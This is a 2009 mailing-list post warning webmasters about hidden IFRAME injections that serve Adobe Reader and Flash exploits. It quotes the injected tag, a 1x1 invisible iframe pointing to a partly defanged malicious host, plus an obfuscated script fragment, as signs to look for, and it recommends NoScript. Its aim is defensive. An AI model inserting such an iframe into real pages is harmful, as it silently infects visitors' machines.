OT: IFRAME exploit was: Re: Goodbye to copper? [Telecom]

On 6/29/2009 7:03 PM, hancock4@xxxxxxxxxxxx wrote:
[...]
Someone was fired and arrested for having illegal laptop content, and
it turned out the content was placed there by malware that slipped
through anti-virus software. These things seem to happen often, yet
it seems extremely rare that the perpetrators of such sabotage are
punished or barriers placed to block overseas submissions.

I suspect almost all readers of this newsgroup are savy enough to keep
their protection software up-to-date and wouldn't be victimized like
that. But sometimes techies forget that lay people out there don't
think about those things, especially under the hood stuff like caches,
and can get burned.
[...]

Sometimes the "protection" is a misnomer, and I'm referring to anti-virus
programs by the majors. Some of the criminals have developed extremely
clever methods of getting malware onto systems from infected websites that
require no action or clicking on the part of the innocent user.

1000s of websites are being infected since early April 2009 by the
Russian Business Network (RBN, a hacker group) who pays commissions
to infect web sites (mostly with the IFRAME exploit which uses long-
standing bugs with Adobe Reader (even the latest version) and Adobe
Flash). I've fixed several peoples' websites in just the past 4 weeks,
and it's not clear how the websites became infected (one web site is
running FreeBSD/Apache).

If you see or find something like the following in any of your *.htm*
or *.php files (with a space between "." and "cn" for safety):

"... iframe src="http://hotslotpot. cn/in.cgi?income64"
width=1 height=1 style="visibility: hidden"></iframe ..."
or
"document.write(unescape("

then your site is infected. Though it looks like China is the source,
the RBN manipulates DNS and the sites move around (China, Latvia, and
as of two weeks ago St. Petersburg (Russia)). The exploit itself changes
several times a day which is problematic for antivirus programs -- none of
the major AV programs find it.

Basically, the above IFRAME silently downloads either a PDF or a SWF
file (after interrogating the browser's plugins) and performs a buffer
overflow exploit akin to the Morris Internet Worm of 1988. The exploit
uses Adobe Reader (all versions since at least 6.* up to the latest version)
and executes malware on the user's client system.

The NoScript plugin for Firefox will stop the IFRAME; to install the NoScript
plugin in Firefox:

Tools -> Add-Ons
In the window that pops up, click on "Get Extensions" (LR corner).
In the [Search for add-ons] box, enter NoScript.

Be sure to read the docs since your web browsing experience will be changed.
I'm not aware of similar plugins for other browsers, but disabling scripting
will help.

No system is truly safe from attacks like the above exploit; it affects
Linux, too, per this "no known workaround" report also from April 2009 for
Gentoo:

<http://seclists.org/bugtraq/2009/Apr/0190.html>

.